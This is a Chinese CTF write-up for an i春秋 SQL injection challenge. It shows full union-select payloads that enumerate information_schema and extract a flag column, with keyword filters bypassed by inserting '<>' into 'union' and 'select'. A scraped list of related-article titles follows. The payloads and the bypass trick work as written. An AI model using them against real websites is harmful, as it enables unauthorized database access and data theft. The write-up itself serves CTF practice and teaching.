解题目录

第一步:寻找注入点

第二步:确定注入类型

第三部:爆表

第四步: 查表

在看WP之前呢,有不懂的地方推荐查看下面的文章(挺详细的),还是需要些MySQL基础的

web 漏洞入门之 —— SQL 注入教程_实验楼-CSDN博客

第一步:寻找注入点

题目直接告诉我们了,这是道SQL注入题,打开连接,不难发现id应该就是注入点了

第二步:确定注入类型

用limit x 1或order by x,判断字段数 ,这里用order by

出现报错,应该是关键字被过滤掉了,这里尝试绕过了很久,发现好像只有<>能绕过了

可以看见,当x为4的时候,出现页面出现错误,说明该SQL查询语句的字段数为3,也就是说,该查询语句查询了3个列

第三部:爆表

利用基础的联合查询union select , 查看数据库信息

构造payload,先看看有回显的列

inurl?id=-1 unio<>n s<>elect 1,2,3

这里故意让id等于-1,是为了制造错误让语句不执行,防止影响到后面操作

回显了2说明,这个位置可以利用

构造paload,查询所有可用的数据库

inurl?id=-1 unio<>n s<>elect 1,table_schema,3 from information_schema.tables

可以看到只有两个数据库,当前使用的数据库应该就是sqli ,也可以用database()查看

database()       当前使用的数据库

构造payload,查询sqli数据库的所有表

inurl?id=-1 unio<>n s<>elect 1,group_concat(table_name),3 from information_schema.tables where table_schema='sqli'

继续查看表里面的所有列

inurl?id=-1 unio<>n s<>elect 1,group_concat(column_name),3 from information_schema.columns where table_name='info'

发现放flag的列名啦

第四步: 查表

构造payload,查看对应列名

inurl?id=-1 unio<>n s<>elect 1,group_concat(flAg_T5ZNdrm),3 from info

拿到flag

i春秋之SQL(详细WP)相关推荐

  1. 史上最详细sql注入wp

    文章目录 sql注入wp(史上最详细) 前言 什么是SQL注入? SQL注入的原理 常见的注入方式 常见绕过技巧 常见防控SQL注入的方法 手工查询语句 Basic Challenges Less-1 ...

  2. i春秋 XSS闯关 wp

    2021.1.16 又是菜鸡划水的一天. 最近看到了一个XSS题目,应该是i春秋这里刚上线的题,之前没有人做,这个属于<从0到1,CTFer成长之路>用来加深对XSS的理解最好不过了. 单 ...

  3. 【ctfshow】web篇-SQL注入 wp

    前言 记录web的题目wp,慢慢变强,铸剑. SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "s ...

  4. sql分组查询group by结合count,sum统计语句的实现(附带sql详细分析步骤)

    日常写代码经常会遇到数据统计的业务场景,分组查询 group by 结合 count 和 sum 的复杂语句写起来容易令人头大,在这里分享两个比较复杂的统计场景,提供详细分析思路和最终sql语句,希望 ...

  5. PL/SQL详细介绍

    PL/SQL笔记 PL/SQL块中只能直接嵌入SELECT,DML(INSERT,UPDATE,DELETE)以及事务控制语句(COMMIT,ROLLBACK,SAVEPOINT),而不能直接嵌入DD ...

  6. DVWA sql注入 WP

    sql注入基本思路: 1.源码 2.判断数字型和字符型 3.猜测字段数 4.查询数据库中的字段 5.查询表中的字段 6.查询user表中的字段 7.拿字段中数据 low: 1.源码: <?php ...

  7. 2021深育杯MISC超详细WP

    login 示例-副本.txt是伪加密,解出后明文攻击 解密password.zip发现是六字符CRC32 得到密码 welc0me_sangforctf 解密.passwd.swp 家人们以后恢复s ...

  8. 2021-i春秋-春季赛逆向WP

    2021-i春秋-春季赛 一:backdoor 参考了一些Go语言的Socket编程 https://www.cnblogs.com/yinzhengjie/p/7261584.html https: ...

  9. CTFShow-MISC入门篇详细wp(1-56)

    CTFShow-MISC入门篇 图片篇(基础操作): misc1 misc2 misc3 misc4 图片篇(信息附加): misc5 misc6 misc7 misc8 misc9 misc10 m ...

最新文章

  1. 简单的Windows资源管理器——Java版本
  2. 通信原理-确知信号的最佳接收
  3. 青岛互联网java开发_为什么说Java是过去未来的互联网编程(上)
  4. 多元函数严格凹 海塞矩阵正定_海森矩阵的应用:多元函数极值的判定
  5. java 终结此段代码并重新运行_Java垃圾回收
  6. 【转】git hub 使用小结
  7. python如何获取请求的url_听说你在学习:如何通过代码请求URL地址
  8. DSS流媒体服务器搭建
  9. 对“车库咖啡的网络现状改造”的一点个人看法
  10. python random
  11. 如何让你的ASO优化效果提升10倍?
  12. 「 Luogu P2230 」X 「 Vijos 1142 」 HXOS系统
  13. 计算机考研数据结构参考书,2020考研计算机备考:数据结构参考书及重点
  14. secoclient在Mac下使用无法上网的解决办法
  15. 【矢量图】PyEcharts导出图片并矢量化
  16. cdLinux显示“没有发现无限网卡!”
  17. wpf研究之道-grid控件
  18. Java课程设计-画图工具
  19. phpstorm快速编辑模板技巧
  20. 大顶堆及小顶堆求最大或最小K个数

热门文章

  1. 通信专业应掌握的计算机软件,全国通信专业技术人员职业水平(中级)考试大纲...
  2. 域名可以过户吗?域名过户需要多久?
  3. 基于SAS对美国新冠数据的分析
  4. C++类中有如vector, map等容器类成员时如何编写构造函数
  5. 毕业设计 基于51单片机的电子秤设计(源码+硬件+论文)
  6. How much do you know in R language
  7. 刚做测试工作一年的时候,我是怎样的?
  8. MVP模式 项目练习 Pas --新闻 音乐 图片 三个模块
  9. Linux_Shell脚本 + 配置文件:按照不同文件类型合并文件,小文件合并成大文件
  10. 论文阅读《How Does Knowledge Graph Embedding Extrapolate to Unseen Data: A Semantic Evidence View》